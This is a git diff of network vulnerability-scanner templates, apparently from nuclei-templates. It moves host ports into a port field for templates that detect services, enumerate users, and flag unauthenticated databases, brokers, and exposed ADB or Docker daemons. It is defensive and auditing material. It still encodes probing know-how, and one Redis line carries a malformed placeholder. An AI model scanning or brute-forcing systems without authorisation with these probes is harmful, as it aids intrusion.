diff --git a/network/detection/totemomail-smtp-detect.yaml b/network/detection/totemomail-smtp-detect.yaml
index 9bf92503a0..25c4ec402b 100644
--- a/network/detection/totemomail-smtp-detect.yaml
+++ b/network/detection/totemomail-smtp-detect.yaml
@@ -4,11 +4,11 @@ info:
name: Totemomail SMTP Server Detection
author: princechaddha
severity: info
- tags: mail,smtp,network,totemomail,detect
description: |
Totemomail is a comprehensive email solution designed to address all aspects of digital communication security.
metadata:
- max-request: 2
+ max-request: 1
+ tags: mail,smtp,network,totemomail,detect
tcp:
- inputs:
@@ -17,7 +17,7 @@ tcp:
host:
- "{{Hostname}}"
- - "{{Host}}:25"
+ port: 25
matchers:
- type: word
diff --git a/network/detection/vmware-authentication-daemon-detect.yaml b/network/detection/vmware-authentication-daemon-detect.yaml
index 60c21d02b4..09a4f326e6 100644
--- a/network/detection/vmware-authentication-daemon-detect.yaml
+++ b/network/detection/vmware-authentication-daemon-detect.yaml
@@ -7,9 +7,9 @@ info:
description: |
vmauthd is the VMWare authentication daemon that is included with many VMWare products, including ESX(i), and Workstation.
metadata:
- max-request: 2
+ max-request: 1
+ shodan-query: product:"VMware Authentication Daemon"
verified: true
- shodan-query: 'product:"VMware Authentication Daemon"'
tags: network,vmware,authenticated,detect
tcp:
@@ -18,7 +18,7 @@ tcp:
- data: "\n"
host:
- "{{Hostname}}"
- - "{{Host}}:902"
+ port: 902
matchers:
- type: word
diff --git a/network/detection/vnc-service-detect.yaml b/network/detection/vnc-service-detect.yaml
index 0fe419db1c..5f765590ab 100644
--- a/network/detection/vnc-service-detect.yaml
+++ b/network/detection/vnc-service-detect.yaml
@@ -7,16 +7,16 @@ info:
description: A Virtual Network Computing (VNC) service was detected.
classification:
cwe-id: CWE-200
- tags: network,vnc,service,detect
metadata:
- max-request: 2
+ max-request: 1
+ tags: network,vnc,service,detect
tcp:
- inputs:
- data: "\r\n"
host:
- - "{{Host}}:5900"
- "{{Hostname}}"
+ port: 5900
matchers:
- type: word
diff --git a/network/detection/xlight-ftp-service-detect.yaml b/network/detection/xlight-ftp-service-detect.yaml
index 910c17e7b8..d1d3c60b8b 100644
--- a/network/detection/xlight-ftp-service-detect.yaml
+++ b/network/detection/xlight-ftp-service-detect.yaml
@@ -7,9 +7,9 @@ info:
description: |
The File Transfer Protocol (FTP) is a standard network protocol used to transfer computer files between a client and server on a computer network.
metadata:
- max-request: 2
+ max-request: 1
+ shodan-query: product:"Xlight ftpd"
verified: true
- shodan-query: 'product:"Xlight ftpd"'
tags: network,ftp,xlight,detect
tcp:
@@ -18,7 +18,7 @@ tcp:
- data: "\n"
host:
- "{{Hostname}}"
- - "{{Host}}:21"
+ port: 21
matchers:
- type: word
diff --git a/network/enumeration/beanstalk-service.yaml b/network/enumeration/beanstalk-service.yaml
index 364078788d..104d8c3fd1 100644
--- a/network/enumeration/beanstalk-service.yaml
+++ b/network/enumeration/beanstalk-service.yaml
@@ -20,7 +20,8 @@ tcp:
read: 8
host:
- - "{{Host}}:11300"
+ - "{{Hostname}}"
+ port: 11300
matchers:
- type: word
diff --git a/network/enumeration/kafka-topics-list.yaml b/network/enumeration/kafka-topics-list.yaml
index 7bc3dfa4f4..fce59673c7 100644
--- a/network/enumeration/kafka-topics-list.yaml
+++ b/network/enumeration/kafka-topics-list.yaml
@@ -23,7 +23,8 @@ tcp:
read: 1024
host:
- - "{{Host}}:9092"
+ - "{{Hostname}}"
+ port: 9092
matchers-condition: or
matchers:
diff --git a/network/enumeration/mongodb-info-enum.yaml b/network/enumeration/mongodb-info-enum.yaml
index f142bf6a5b..df5432c84b 100644
--- a/network/enumeration/mongodb-info-enum.yaml
+++ b/network/enumeration/mongodb-info-enum.yaml
@@ -10,12 +10,11 @@ info:
- https://nmap.org/nsedoc/scripts/mongodb-info.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
- cvss-score: 0.0
cwe-id: CWE-200
metadata:
- max-request: 2
- verified: true
+ max-request: 1
shodan-query: mongodb server information
+ verified: true
tags: network,mongodb,enum
tcp:
@@ -25,7 +24,7 @@ tcp:
host:
- "{{Hostname}}"
- - "{{Host}}:27017"
+ port: 27017
read-size: 2048
matchers:
diff --git a/network/enumeration/niagara-fox-info-enum.yaml b/network/enumeration/niagara-fox-info-enum.yaml
index d7250f9014..1d8d3d7d36 100644
--- a/network/enumeration/niagara-fox-info-enum.yaml
+++ b/network/enumeration/niagara-fox-info-enum.yaml
@@ -6,12 +6,12 @@ info:
severity: info
description: |
Niagara Fox Protocol is a building automation protocol used between the Niagara software systems by Tridium.
- metadata:
- max-request: 2
- verified: true
- shodan-query: 'product:"Niagara Fox"'
reference:
- https://nmap.org/nsedoc/scripts/fox-info.html
+ metadata:
+ max-request: 1
+ shodan-query: product:"Niagara Fox"
+ verified: true
tags: network,fox,niagara,enum
tcp:
@@ -19,7 +19,7 @@ tcp:
- data: "fox a 1 -1 fox hello\n{\nfox.version=s:1.0\nid=i:1\n};;\n"
host:
- "{{Hostname}}"
- - "{{Host}}:1911"
+ port: 1911
matchers:
- type: word
diff --git a/network/enumeration/psql-user-enum.yaml b/network/enumeration/psql-user-enum.yaml
index e35f0ef8d0..5416a20e19 100644
--- a/network/enumeration/psql-user-enum.yaml
+++ b/network/enumeration/psql-user-enum.yaml
@@ -9,7 +9,7 @@ info:
reference:
- https://medium.com/@netscylla/pentesters-guide-to-postgresql-hacking-59895f4f007
metadata:
- max-request: 2
+ max-request: 1
shodan-query: port:5432 product:"PostgreSQL"
verified: "true"
tags: network,postgresql,db,unauth,enum,psql
@@ -21,7 +21,7 @@ tcp:
host:
- "{{Hostname}}"
- - "{{Host}}:5432"
+ port: 5432
attack: clusterbomb
payloads:
diff --git a/network/enumeration/smtp-commands-enum.yaml b/network/enumeration/smtp-commands-enum.yaml
index e87c3b61e0..23ae8283cb 100644
--- a/network/enumeration/smtp-commands-enum.yaml
+++ b/network/enumeration/smtp-commands-enum.yaml
@@ -9,9 +9,9 @@ info:
reference:
- https://nmap.org/nsedoc/scripts/smtp-commands.html
metadata:
- max-request: 2
+ max-request: 1
+ shodan-query: smtp
verified: true
- shodan-query: 'smtp'
tags: network,enum,smtp,mail
tcp:
@@ -23,7 +23,7 @@ tcp:
host:
- "{{Hostname}}"
- - "{{Host}}:25"
+ port: 25
matchers:
- type: word
diff --git a/network/enumeration/smtp/smtp-user-enum.yaml b/network/enumeration/smtp/smtp-user-enum.yaml
index 4a8cc9d900..8755237141 100644
--- a/network/enumeration/smtp/smtp-user-enum.yaml
+++ b/network/enumeration/smtp/smtp-user-enum.yaml
@@ -9,7 +9,7 @@ info:
reference:
- https://nmap.org/nsedoc/scripts/smtp-enum-users.html
metadata:
- max-request: 2
+ max-request: 1
shodan-query: smtp
verified: true
tags: network,enum,smtp,mail
@@ -23,7 +23,7 @@ tcp:
host:
- "{{Hostname}}"
- - "{{Host}}:25"
+ port: 25
attack: batteringram
payloads:
diff --git a/network/exposures/cisco-smi-exposure.yaml b/network/exposures/cisco-smi-exposure.yaml
index 5ad14a2be3..e2f9022426 100644
--- a/network/exposures/cisco-smi-exposure.yaml
+++ b/network/exposures/cisco-smi-exposure.yaml
@@ -15,9 +15,9 @@ info:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cwe-id: CWE-200
- tags: network,cisco,smi,exposure
metadata:
- max-request: 2
+ max-request: 1
+ tags: network,cisco,smi,exposure
tcp:
- inputs:
@@ -26,7 +26,7 @@ tcp:
host:
- "{{Hostname}}"
- - "{{Host}}:4786"
+ port: 4786
matchers:
- type: word
diff --git a/network/exposures/exposed-adb.yaml b/network/exposures/exposed-adb.yaml
index 6c05d3c22e..6c725238d4 100644
--- a/network/exposures/exposed-adb.yaml
+++ b/network/exposures/exposed-adb.yaml
@@ -9,9 +9,9 @@ info:
- https://doublepulsar.com/root-bridge-how-thousands-of-internet-connected-android-devices-now-have-no-security-and-are-b46a68cb0f20
- https://www.hackeracademy.org/how-to-hack-android-device-with-adb-android-debugging-bridge
- https://www.securezoo.com/2018/06/thousands-of-android-devices-leave-debug-port-5555-exposed/
- tags: network,adb,rce,android,exposure
metadata:
- max-request: 2
+ max-request: 1
+ tags: network,adb,rce,android,exposure
tcp:
- inputs:
@@ -23,7 +23,7 @@ tcp:
host:
- "{{Hostname}}"
- - "{{Host}}:5555"
+ port: 5555
matchers:
- type: word
diff --git a/network/exposures/exposed-dockerd.yaml b/network/exposures/exposed-dockerd.yaml
index 04ac7db27a..f5ad4518d5 100644
--- a/network/exposures/exposed-dockerd.yaml
+++ b/network/exposures/exposed-dockerd.yaml
@@ -7,9 +7,9 @@ info:
description: |
Docker Daemon exposed on the network map can help remote attacker to gain access to the Docker containers and potentially the host system.
metadata:
- max-request: 2
- verified: true
+ max-request: 1
shodan-query: port:2375 product:"docker"
+ verified: true
tags: network,docker,exposure
tcp:
@@ -18,7 +18,7 @@ tcp:
host:
- "{{Hostname}}"
- - "{{Host}}:2375"
+ port: 2375
matchers:
- type: word
diff --git a/network/exposures/exposed-redis.yaml b/network/exposures/exposed-redis.yaml
index bf0d983473..b650a33d0d 100644
--- a/network/exposures/exposed-redis.yaml
+++ b/network/exposures/exposed-redis.yaml
@@ -12,7 +12,7 @@ info:
cvss-score: 7.2
cwe-id: CWE-306
metadata:
- max-request: 4
+ max-request: 1
tags: network,redis,unauth,exposure
tcp:
@@ -20,10 +20,8 @@ tcp:
- data: "info\r\nquit\r\n"
host:
- - "{{Hostname}}"
- - "{{Host}}:6379"
- "tls://{Hostname}}"
- - "tls://{{Host}}:6380"
+ port: 6380
read-size: 2048
matchers-condition: and
diff --git a/network/exposures/exposed-zookeeper.yaml b/network/exposures/exposed-zookeeper.yaml
index 5bd1d628b4..c3a87b47aa 100644
--- a/network/exposures/exposed-zookeeper.yaml
+++ b/network/exposures/exposed-zookeeper.yaml
@@ -7,9 +7,9 @@ info:
description: Apache ZooKeeper was able to be accessed without any required authentication.
reference:
- https://zookeeper.apache.org/security.html
- tags: network,zookeeper,unauth,exposure
metadata:
- max-request: 2
+ max-request: 1
+ tags: network,zookeeper,unauth,exposure
tcp:
- inputs:
@@ -17,7 +17,7 @@ tcp:
host:
- "{{Hostname}}"
- - "{{Host}}:2181"
+ port: 2181
read-size: 2048
matchers:
diff --git a/network/misconfig/apache-dubbo-unauth.yaml b/network/misconfig/apache-dubbo-unauth.yaml
index ad5622afd6..9e0ef74302 100644
--- a/network/misconfig/apache-dubbo-unauth.yaml
+++ b/network/misconfig/apache-dubbo-unauth.yaml
@@ -10,7 +10,7 @@ info:
- https://dubbo.apache.org/en/docs3-v2/java-sdk/advanced-features-and-usage/security/auth/
metadata:
fofa-query: apache dubbo
- max-request: 2
+ max-request: 1
verified: true
tags: network,dubbo,apache,unauth,misconfig
@@ -21,7 +21,7 @@ tcp:
host:
- "{{Hostname}}"
- - "{{Host}}:20880"
+ port: 20880
read-size: 2048
matchers:
diff --git a/network/misconfig/apache-rocketmq-broker-unauth.yaml b/network/misconfig/apache-rocketmq-broker-unauth.yaml
index 5b688e9d1c..10c1854114 100644
--- a/network/misconfig/apache-rocketmq-broker-unauth.yaml
+++ b/network/misconfig/apache-rocketmq-broker-unauth.yaml
@@ -10,7 +10,7 @@ info:
- https://rocketmq.apache.org/docs/bestPractice/03access
metadata:
fofa-query: protocol="rocketmq"
- max-request: 2
+ max-request: 1
shodan-query: title:"RocketMQ"
verified: true
tags: network,rocketmq,broker,apache,unauth,misconfig
@@ -22,7 +22,7 @@ tcp:
host:
- "{{Hostname}}"
- - "{{Host}}:10911"
+ port: 10911
read-size: 2048
matchers-condition: and
diff --git a/network/misconfig/clamav-unauth.yaml b/network/misconfig/clamav-unauth.yaml
index bd6b28b43a..bcdd433853 100644
--- a/network/misconfig/clamav-unauth.yaml
+++ b/network/misconfig/clamav-unauth.yaml
@@ -8,13 +8,13 @@ info:
ClamAV server 0.99.2, and possibly other previous versions, allow the execution
of dangerous service commands without authentication. Specifically, the command 'SCAN'
may be used to list system files and the command 'SHUTDOWN' shut downs the service.
- metadata:
- max-request: 2
- verified: true
- shodan-query: 'port:3310 product:"ClamAV" version:"0.99.2"'
reference:
- https://seclists.org/nmap-dev/2016/q2/201
- https://bugzilla.clamav.net/show_bug.cgi?id=11585
+ metadata:
+ max-request: 1
+ shodan-query: port:3310 product:"ClamAV" version:"0.99.2"
+ verified: true
tags: network,clamav,unauth,seclists,misconfig
tcp:
@@ -22,7 +22,7 @@ tcp:
- data: "SCAN /nonexistent/{{to_lower(rand_text_alpha(10))}}\r\n"
host:
- "{{Hostname}}"
- - "{{Host}}:3310"
+ port: 3310
read-size: 48
matchers:
diff --git a/network/misconfig/clickhouse-unauth.yaml b/network/misconfig/clickhouse-unauth.yaml
index 868bf37400..99acb401f2 100644
--- a/network/misconfig/clickhouse-unauth.yaml
+++ b/network/misconfig/clickhouse-unauth.yaml
@@ -5,9 +5,9 @@ info:
author: lu4nx
severity: high
description: ClickHouse was able to be accessed with no required authentication in place.
- tags: network,clickhouse,unauth,misconfig
metadata:
- max-request: 2
+ max-request: 1
+ tags: network,clickhouse,unauth,misconfig
tcp:
- inputs:
@@ -18,7 +18,7 @@ tcp:
host:
- "{{Hostname}}"
- - "{{Host}}:9000"
+ port: 9000
read-size: 100
matchers:
diff --git a/network/misconfig/dropbear-weakalgo.yaml b/network/misconfig/dropbear-weakalgo.yaml
index a17caa95ad..f6a4a5d82a 100644
--- a/network/misconfig/dropbear-weakalgo.yaml
+++ b/network/misconfig/dropbear-weakalgo.yaml
@@ -6,14 +6,14 @@ info:
severity: low
description: |
The SSH key exchange algorithm is fundamental to keep the protocol secure. It is what allows two previously unknown parties to generate a shared key in plain sight, and have that secret remain private to the client and server. Over time, some implementations of this algorithm have been identified as weak or vulnerable.
- remediation: |
- Disable the weak algorithms.
reference: |
https://www.virtuesecurity.com/kb/ssh-weak-key-exchange-algorithms-enabled
+ remediation: |
+ Disable the weak algorithms.
metadata:
- max-request: 2
+ max-request: 1
+ shodan-query: product:"Dropbear sshd"
verified: true
- shodan-query: 'product:"Dropbear sshd"'
tags: network,ssh,dropbear,misconfig
tcp:
@@ -22,7 +22,7 @@ tcp:
host:
- "{{Hostname}}"
- - "{{Host}}:22"
+ port: 22
matchers:
- type: word
diff --git a/network/misconfig/dropbear-weakmac.yaml b/network/misconfig/dropbear-weakmac.yaml
index 1b1ffefb43..7e69936ac9 100644
--- a/network/misconfig/dropbear-weakmac.yaml
+++ b/network/misconfig/dropbear-weakmac.yaml
@@ -6,14 +6,14 @@ info:
severity: low
description: |
The mac-alg command specifies which MAC algorithms in the SSH client profile for SSH encryption negotiation with an SFTP server when the DataPower Gateway acts as an SFTP client.
- remediation: |
- Disable MD5 and 96-bit MAC algorithms.
reference: |
https://www.virtuesecurity.com/kb/ssh-weak-mac-algorithms-enabled
+ remediation: |
+ Disable MD5 and 96-bit MAC algorithms.
metadata:
- max-request: 2
+ max-request: 1
+ shodan-query: product:"Dropbear sshd"
verified: true
- shodan-query: 'product:"Dropbear sshd"'
tags: network,ssh,dropbear,misconfig
tcp:
@@ -22,7 +22,7 @@ tcp:
host:
- "{{Hostname}}"
- - "{{Host}}:22"
+ port: 22
matchers-condition: and
matchers:
diff --git a/network/misconfig/ganglia-xml-grid-monitor.yaml b/network/misconfig/ganglia-xml-grid-monitor.yaml
index 0c08ca64b4..db7c96a7fd 100644
--- a/network/misconfig/ganglia-xml-grid-monitor.yaml
+++ b/network/misconfig/ganglia-xml-grid-monitor.yaml
@@ -7,9 +7,9 @@ info:
description: Ganglia is a scalable distributed monitoring system for high-performance computing systems such as clusters and Grids.
reference:
- http://ganglia.info/
- tags: ganglia,network,misconfig
metadata:
- max-request: 2
+ max-request: 1
+ tags: ganglia,network,misconfig
tcp:
- inputs:
@@ -17,7 +17,7 @@ tcp:
host:
- "{{Hostname}}"
- - "{{Host}}:8649"
+ port: 8649
read-size: 2048
matchers:
diff --git a/network/misconfig/memcached-stats.yaml b/network/misconfig/memcached-stats.yaml
index f0b6d59076..b7f07c666a 100644
--- a/network/misconfig/memcached-stats.yaml
+++ b/network/misconfig/memcached-stats.yaml
@@ -4,11 +4,11 @@ info:
name: Memcached stats disclosure
author: pdteam
severity: low
- tags: network,memcached,misconfig
description: |
Memcached stats is used to return server statistics such as PID, version, connections, etc.
metadata:
- max-request: 2
+ max-request: 1
+ tags: network,memcached,misconfig
tcp:
- inputs:
@@ -16,7 +16,7 @@ tcp:
host:
- "{{Hostname}}"
- - "{{Host}}:11211"
+ port: 11211
read-size: 2048
matchers:
diff --git a/network/misconfig/mongodb-unauth.yaml b/network/misconfig/mongodb-unauth.yaml
index 658f0aaa48..4bd358db9f 100644
--- a/network/misconfig/mongodb-unauth.yaml
+++ b/network/misconfig/mongodb-unauth.yaml
@@ -10,9 +10,9 @@ info:
- https://book.hacktricks.xyz/pentesting/27017-27018-mongodb
- https://www.mongodb.com/features/mongodb-authentication
remediation: Enable Authentication in MongoDB
- tags: network,mongodb,unauth,misconfig
metadata:
- max-request: 2
+ max-request: 1
+ tags: network,mongodb,unauth,misconfig
tcp:
- inputs:
@@ -21,7 +21,8 @@ tcp:
host:
- "{{Hostname}}"
- - "{{Host}}:27017"
+ port: 27017
+
read-size: 2048
matchers:
- type: word
diff --git a/network/misconfig/mysql-native-password.yaml b/network/misconfig/mysql-native-password.yaml
index f668b03555..c4f682871a 100644
--- a/network/misconfig/mysql-native-password.yaml
+++ b/network/misconfig/mysql-native-password.yaml
@@ -9,16 +9,15 @@ info:
- https://github.com/Tinram/MySQL-Brute
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
- cvss-score: 0.0
cwe-id: CWE-200
- tags: network,mysql,bruteforce,db,misconfig
metadata:
- max-request: 2
+ max-request: 1
+ tags: network,mysql,bruteforce,db,misconfig
tcp:
- host:
- "{{Hostname}}"
- - "{{Host}}:3306"
+ port: 3306
matchers:
- type: word
diff --git a/network/misconfig/printers-info-leak.yaml b/network/misconfig/printers-info-leak.yaml
index c3c0a66b09..2bcb745a1e 100644
--- a/network/misconfig/printers-info-leak.yaml
+++ b/network/misconfig/printers-info-leak.yaml
@@ -16,7 +16,9 @@ tcp:
- inputs:
- data: "@PJL INFO STATUS\n"
host:
- - "{{Host}}:9100"
+ - "{{Hostname}}"
+ port: 9100
+
matchers:
- type: word
words:
diff --git a/network/misconfig/sap-router-info-leak.yaml b/network/misconfig/sap-router-info-leak.yaml
index 92736e7e1e..ab28f3c96d 100644
--- a/network/misconfig/sap-router-info-leak.yaml
+++ b/network/misconfig/sap-router-info-leak.yaml
@@ -8,9 +8,9 @@ info:
reference:
- https://securityforeveryone.com/tools/saprouter-routing-information-leakage-vulnerability-scanner
- https://support.sap.com/en/tools/connectivity-tools/saprouter.html
- tags: network,sap,misconfig
metadata:
- max-request: 2
+ max-request: 1
+ tags: network,sap,misconfig
tcp:
- inputs:
@@ -19,7 +19,7 @@ tcp:
host:
- "{{Hostname}}"
- - "{{Host}}:3299"
+ port: 3299
read-size: 2048
matchers:
diff --git a/network/misconfig/tidb-native-password.yaml b/network/misconfig/tidb-native-password.yaml
index 54ccad4c2d..aeb6e69353 100644
--- a/network/misconfig/tidb-native-password.yaml
+++ b/network/misconfig/tidb-native-password.yaml
@@ -9,14 +9,14 @@ info:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cwe-id: CWE-200
- tags: network,tidb,bruteforce,db,misconfig
metadata:
- max-request: 2
+ max-request: 1
+ tags: network,tidb,bruteforce,db,misconfig
tcp:
- host:
- "{{Hostname}}"
- - "{{Host}}:4000"
+ port: 4000
matchers:
- type: word
diff --git a/network/misconfig/tidb-unauth.yaml b/network/misconfig/tidb-unauth.yaml
index 5b5e8a997f..d6d2a94c99 100644
--- a/network/misconfig/tidb-unauth.yaml
+++ b/network/misconfig/tidb-unauth.yaml
@@ -6,7 +6,7 @@ info:
severity: high
description: TiDB server was able to be accessed because no authentication was required.
metadata:
- max-request: 2
+ max-request: 1
zoomeye-query: tidb +port:"4000"
tags: network,tidb,unauth,misconfig
@@ -18,7 +18,7 @@ tcp:
host:
- "{{Hostname}}"
- - "{{Host}}:4000"
+ port: 4000
read-size: 1024
diff --git a/network/misconfig/unauth-psql.yaml b/network/misconfig/unauth-psql.yaml
index cbe4f4cceb..66d07bcd01 100644
--- a/network/misconfig/unauth-psql.yaml
+++ b/network/misconfig/unauth-psql.yaml
@@ -9,7 +9,7 @@ info:
reference:
- https://www.postgresql.org/docs/9.6/auth-methods.html
metadata:
- max-request: 2
+ max-request: 1
shodan-query: port:5432 product:"PostgreSQL"
verified: "true"
tags: network,postgresql,db,unauth,misconfig
@@ -24,7 +24,7 @@ tcp:
read: 1024
host:
- "{{Hostname}}"
- - "{{Host}}:5432"
+ port: 5432
matchers-condition: and
matchers:
diff --git a/network/vulnerabilities/clockwatch-enterprise-rce.yaml b/network/vulnerabilities/clockwatch-enterprise-rce.yaml
index 3418380f5f..633168c204 100644
--- a/network/vulnerabilities/clockwatch-enterprise-rce.yaml
+++ b/network/vulnerabilities/clockwatch-enterprise-rce.yaml
@@ -10,11 +10,11 @@ info:
- https://blog.grimm-co.com/2021/07/old-dog-same-tricks.html
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
- cvss-score: 10.0
+ cvss-score: 10
cwe-id: CWE-77
- tags: clockwatch,rce,network
metadata:
- max-request: 2
+ max-request: 1
+ tags: clockwatch,rce,network
tcp:
- inputs:
@@ -22,7 +22,7 @@ tcp:
host:
- "{{Hostname}}"
- - "{{Host}}:1001"
+ port: 1001
matchers-condition: and
matchers:
diff --git a/templates-checksum.txt b/templates-checksum.txt
index c58d17cb1e..d83c5aa6d8 100644
--- a/templates-checksum.txt
+++ b/templates-checksum.txt
@@ -8,8 +8,8 @@ TEMPLATES-STATS.json:17f21c160bed72fb6f675d0f5ade4b5e191870b0
TEMPLATES-STATS.md:2c7c3af0ac116eb78b25f1537ab533d51f167dcf
TOP-10.md:cf481618b8666f0cfd3846b7b4a550926093b0b2
contributors.json:8d840b1db8c1af9a3927448841f817aa9c850de9
-cves.json:ea50d934bd6f4d67ccdf4cfba0dd3b997fa1e52c
-cves.json-checksum.txt:263d1c5437bc59b8e969b3db7f11e87193a8ce6d
+cves.json:0bab0d9ddda6759c34bb88d57e44c11030dd69e4
+cves.json-checksum.txt:9212314a5ad1b8744e91fe1534a405b326c4e645
dns/azure-takeover-detection.yaml:bcfb33e8a76b75042967f0301e57dc98d5f2da7c
dns/caa-fingerprint.yaml:7dcc71c91d6cb3d8e290e09b52768b6017fbb161
dns/detect-dangling-cname.yaml:bba3b5b57357e86830d9f76e28b988107597b75c
@@ -362,7 +362,7 @@ helpers/wordlists/wp-passwords.txt:dd36d46539d71aa9d1ecbdc83c7b74b931986d56
helpers/wordlists/wp-users.txt:b07f7f79b1d6ed1832e37e1d3feea3fd2bfb764b
helpers/wordpress/plugins/ad-inserter.txt:048ceafceae47b034560600476a295b608c60cf4
helpers/wordpress/plugins/add-to-any.txt:08d2e98e6754af941484848930ccbaddfefe13d6
-helpers/wordpress/plugins/admin-menu-editor.txt:4572917cbde34e4ba98ab9a65059efd81be6594b
+helpers/wordpress/plugins/admin-menu-editor.txt:aa8d05244067e63778197cff65d9209d713328a4
helpers/wordpress/plugins/adminimize.txt:f6eef27f4f1b21ffb32d92f3a8eee2e89d01c7df
helpers/wordpress/plugins/advanced-custom-fields.txt:cffca9b2145cbe8b44269c74219f807eace99c3e
helpers/wordpress/plugins/akismet.txt:e710dd44fa12f98194f8bba2bb20cba7bee18ff6
@@ -372,7 +372,7 @@ helpers/wordpress/plugins/all-in-one-wp-migration.txt:addf63c8a9f97e52b5b7aca6dc
helpers/wordpress/plugins/all-in-one-wp-security-and-firewall.txt:32caf6abda6a7a1a799e1775e6c5b3e7e32ad59f
helpers/wordpress/plugins/amp.txt:cc005cc7de6351bdaa671675148c076564275a57
helpers/wordpress/plugins/antispam-bee.txt:bd5240b767bb950186835acb8bf1d4cb794a5706
-helpers/wordpress/plugins/astra-sites.txt:fbc954f986ea78ee55f14e1ee288f60983e46fb5
+helpers/wordpress/plugins/astra-sites.txt:23d49915eae53800c735cfc0f01c21a9d05e727a
helpers/wordpress/plugins/astra-widgets.txt:386ef6797a9c4de50f240b16bd76bbeae35a5711
helpers/wordpress/plugins/autoptimize.txt:661ae89c9a4b16c450c2a094d410c4ee74719cb3
helpers/wordpress/plugins/backwpup.txt:063ee00ca80d81e068dd404b59ceb2a03b2e7109
@@ -485,13 +485,13 @@ helpers/wordpress/plugins/pdf-embedder.txt:fe43108f583e1215970ae2e88527d0fbd89b7
helpers/wordpress/plugins/photo-gallery.txt:118daf97168a9a15434efdbbaa6d2dbe5614eec6
helpers/wordpress/plugins/php-compatibility-checker.txt:c117423da3e5e169d36e3111880b709d28e85308
helpers/wordpress/plugins/pinterest-for-woocommerce.txt:4119e202faec947c57ff360c949b277fd6c29cd4
-helpers/wordpress/plugins/pixelyoursite.txt:f358a15cc523a1f31429fce832dc8c0c554fc41b
+helpers/wordpress/plugins/pixelyoursite.txt:af04551215298737e83ffeff86e0a4a63e5f57af
helpers/wordpress/plugins/polylang.txt:c7fc6bde7dbf4cb2d89ab4b2bd57e166ce750ec0
helpers/wordpress/plugins/popup-builder.txt:fc3e46507eb91f2ee9902bdf4b44b9e897b6eea7
helpers/wordpress/plugins/popup-maker.txt:2b3c6ac23cfffce2c714f7553284e912852ab2fe
helpers/wordpress/plugins/post-smtp.txt:b6ed966424606782d1fc2f9032f0fb0e4d237bd7
helpers/wordpress/plugins/post-types-order.txt:31f566259c1a3f810256e3679e10faa457bb4a0b
-helpers/wordpress/plugins/premium-addons-for-elementor.txt:befa0edb7ef642be5e7dfc7cc7c69bc31127207e
+helpers/wordpress/plugins/premium-addons-for-elementor.txt:1782590faaba5ee6facdf2297f1590794447be5a
helpers/wordpress/plugins/pretty-link.txt:eedf6a14348e4bc362e215e4dcd1e066e0bd16f7
helpers/wordpress/plugins/really-simple-captcha.txt:488784591515bd4cdaa016be4ec9b172dc4e7caf
helpers/wordpress/plugins/really-simple-ssl.txt:b638f84cceb02801b7ef7b94df984fd22b23f59e
@@ -500,8 +500,8 @@ helpers/wordpress/plugins/redux-framework.txt:0f2d74125dea18acce67c02619dcfea86c
helpers/wordpress/plugins/regenerate-thumbnails.txt:aba31d0ba474d83f50978833d17946c355cb20c4
helpers/wordpress/plugins/safe-svg.txt:595d550379b2cb8bccb9659627308ff4e751d23f
helpers/wordpress/plugins/seo-by-rank-math.txt:ee6a6cf943f9c499c0224b71af2aaa48cb166774
-helpers/wordpress/plugins/sg-cachepress.txt:9c381dd6bbe0788e8717d7adc6b2f8b8d3687aaa
-helpers/wordpress/plugins/sg-security.txt:6546e0bd1a292663f6166d3d6d903530b6db35c4
+helpers/wordpress/plugins/sg-cachepress.txt:04e136873d85cb62901bb699285d9280e05828df
+helpers/wordpress/plugins/sg-security.txt:a2048abb201b6201e7cd25e8b0262758a98d59da
helpers/wordpress/plugins/shortcodes-ultimate.txt:c53ed3ab1a6689cbfb71149816b427f4cf870dc3
helpers/wordpress/plugins/shortpixel-image-optimiser.txt:1d9a9eb3723d36c07bbcef114c168744dedfa05e
helpers/wordpress/plugins/simple-custom-post-order.txt:106ca8d85638866255a70e746e9653cec398864b
@@ -537,8 +537,8 @@ helpers/wordpress/plugins/woo-checkout-field-editor-pro.txt:381bb12da04a82580bb6
helpers/wordpress/plugins/woo-variation-swatches.txt:08d2e98e6754af941484848930ccbaddfefe13d6
helpers/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.txt:5b7155a36d36681935655d772bbc981bc2393fa3
helpers/wordpress/plugins/woocommerce-gateway-stripe.txt:7035802a8f118b141c54f97b9e8bf36b7d7f53a2
-helpers/wordpress/plugins/woocommerce-payments.txt:60e6b29cae222d0ccf5641a7ebe9d778961c2629
-helpers/wordpress/plugins/woocommerce-paypal-payments.txt:53847c48faeb5e255ebcdd1a4762a53f7163d7f0
+helpers/wordpress/plugins/woocommerce-payments.txt:5087f47c1da6ef46c35e08c9ec1a9e2db4fc24a4
+helpers/wordpress/plugins/woocommerce-paypal-payments.txt:01b1c534c2db2eebe8eb41bca1f0ffc4193b0e3f
helpers/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.txt:634ac7a7e33e6dc123884fef23157c442970fb87
helpers/wordpress/plugins/woocommerce-services.txt:440a9edb1796d0cd5f2d71aea1a74af81b05abbd
helpers/wordpress/plugins/woocommerce.txt:dfaff11acbd25d0758b7c5294b4ff9d37debac19
@@ -2540,6 +2540,7 @@ http/cves/2023/CVE-2023-24657.yaml:7f6b27269830343d72aabbf9cc3b6468b0402832
http/cves/2023/CVE-2023-24733.yaml:2b371df5ef8cff42ce8aecc6ef5670299835f5a5
http/cves/2023/CVE-2023-24735.yaml:571e0c8b77e6db4d05d1b26591ce8c23a6605826
http/cves/2023/CVE-2023-24737.yaml:4054ade9e45e3b511951b4ef62d855c3f224fbf1
+http/cves/2023/CVE-2023-2479.yaml:ea2e5aa5a99963579d74b5a1b0521c6450e7ec48
http/cves/2023/CVE-2023-25135.yaml:6fde05cc952e0a48856618cc9f0354636815791a
http/cves/2023/CVE-2023-25157.yaml:75256e12bfe90097324f0600dcf0e8d2116e9f99
http/cves/2023/CVE-2023-25346.yaml:24944581a291d6d9ab20cb2c6f4efe877149ae44
